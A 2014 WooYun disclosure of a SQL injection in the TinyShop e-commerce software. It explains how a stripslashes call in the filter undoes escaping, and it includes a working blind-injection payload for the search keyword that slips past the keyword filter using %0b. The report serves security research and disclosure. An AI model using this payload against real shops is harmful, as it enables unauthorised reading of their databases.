当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076537

漏洞标题:TinyShop SQL注入(开启GPC,绕过过滤)

相关厂商:tinyrise.com

漏洞作者: xiaoL

提交时间:2014-09-19 12:30

修复时间:2014-12-15 12:32

公开时间:2014-12-15 12:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-19: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-11-13: 细节向核心白帽子及相关领域专家公开
2014-11-23: 细节向普通白帽子公开
2014-12-03: 细节向实习白帽子公开
2014-12-15: 细节向公众公开

简要描述:

之前的都是找程序员的疏忽,这个位置是绕过程序的防注入。

详细说明:

环境:
GPC = On

public static function sql($str)  //过滤函数
{
if (!get_magic_quotes_gpc()){ //gpc off 就转义,把之前那个奇葩的漏洞补了
//不使用主要是因为,先有mysql的连接
//$str = mysql_real_escape_string($str);
$str = addslashes($str);
}
$str = preg_replace('/([^a-z]+)(select|insert|update|delete|union|into|load_file|outfile|tiny_)/i', ' $2', $str); //这个过滤是可以绕过的
return $str;
}


仔细找发现过滤函数中存在另外一个函数:text
内容如下:

/**@param $str 字符串
* @return 字符串
*@note 处理HTML编辑器的内容,主要是解决JavaScript的注入问题
*/

public static function text($str)
{
$config = HTMLPurifier_Config::createDefault();
$cache_dir=Tiny::getPath('cache')."/htmlpurifier/";
if(!file_exists($cache_dir))
{
File::mkdir($cache_dir);
}
$config = HTMLPurifier_Config::createDefault();
//配置 缓存目录
$config->set('Cache.SerializerPath',$cache_dir); //设置cache目录

//配置 允许flash
$config->set('HTML.SafeEmbed',true);
$config->set('HTML.SafeObject',true);
$config->set('Output.FlashCompat',true);
//$config->set('HTML.Allowed', 'p');
//$config->set('AutoFormat.AutoParagraph', true);
//$config->set('AutoFormat.RemoveEmpty', true);
//允许<a>的target属性
$def = $config->getHTMLDefinition(true);
$def->addAttribute('a', 'target', 'Enum#_blank,_self,_target,_top');

$purifier = new HTMLPurifier($config);
if (get_magic_quotes_gpc())$str = stripslashes($str); //漏洞发生的位置,如果开启了gpc,则反转义一次。
$str = $purifier->purify($str);
return $str;
}


其中对gpc进行一次检查,反转义了。于是去找一个使用text的点。
在代码protected\controllers\index.php中:

//搜索与分类的条件解析
private function parseCondition()
{
$page = intval(Req::args("p"));
$page_size = 36;
$sort = Filter::int(Req::args("sort"));
$sort = $sort==null?0:$sort;
$cid = Filter::int(Req::args("cid"));
$cid = $cid==null?0:$cid;
$brand = Req::args("brand");
$price = Req::args("price");
$keyword = urldecode(Req::args('keyword'));
$keyword = Filter::sql($keyword); //经过了sql
$keyword = Filter::text($keyword); //但是经过text之后,\' => ' 又变回去了,成功闭合了下面的fndAll函数。
//初始化数据
$attrs = $specs = $spec_attr = $category_child = $spec_attr_selected = $selected = $has_category = $category = $current_category = array();
$where = $spec_attr_where = $url = "";
$condition_num = 0;
$model = $this->model;
//基本条件的建立
//关于搜索的处理
$action = strtolower(Req::args("act"));
if($action=='search'){
//关于类型的处理
////提取商品下的类型
$seo_title = $seo_keywords = $keyword;
$where = "name like '%$keyword%'";
$rows = $model->table("goods")->fields("category_id,count(id) as num")->where($where)->group("category_id")->findAll(); //带入了这里进行查询
$category_ids = "";
$category_count = array();
foreach ($rows as $row) {
$category_ids .= $row['category_id'].',';
$category_count[$row['category_id']] = $row['num'];
}
$category_ids = trim($category_ids,",");
$has_category = array();
$seo_description = '';
if($category_ids){
$rows = $model->table("goods_category")->where("id in ($category_ids)")->findAll();
foreach ($rows as $row) {
$path = trim($row['path'],',');
$paths = explode(',', $path);
$root = 0;
if(is_array($paths)) $root = $paths[0];
$row['num'] = $category_count[$row['id']];
$has_category[$root][] = $row;
$seo_description .= $row['name'].',';
}
}
if($cid!=0){
$where = "category_id=$cid and name like '%$keyword%'";
$category = $model->table("goods_category as gc ")->join("left join goods_type as gt on gc.type_id = gt.id")->where("gc.id=$cid")->find();
if($category){
$attrs = unserialize($category['attr']);
$specs = unserialize($category['spec']);
if($category['seo_title']!='') $seo_title = $category['seo_title'];
else $seo_title = $category['name'];
if($category['seo_keywords']!='') $seo_keywords = $category['seo_keywords'];
if($category['seo_description']!='') $seo_description = $category['seo_description'];
}
}

//关于分类检索的处理
}


看注释。

漏洞证明:

由于SQL函数过滤不严
可以适应%0b插入关键字绕过。
最终使用
keyword=MacBook Air%' and (ord(substring((sel%0bect user()) from 1 for 1))=114)-- 1
来bool瞩目
默认用户是root
真:

1111.png


假:

2222.png


3333.png

修复方案:

修复text函数

版权声明:转载请注明来源 xiaoL@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-15 12:32

厂商回复:

谢谢你的反馈,别人已经提交过了,不过还是感谢的你支持。

最新状态:

暂无


漏洞评价:

评论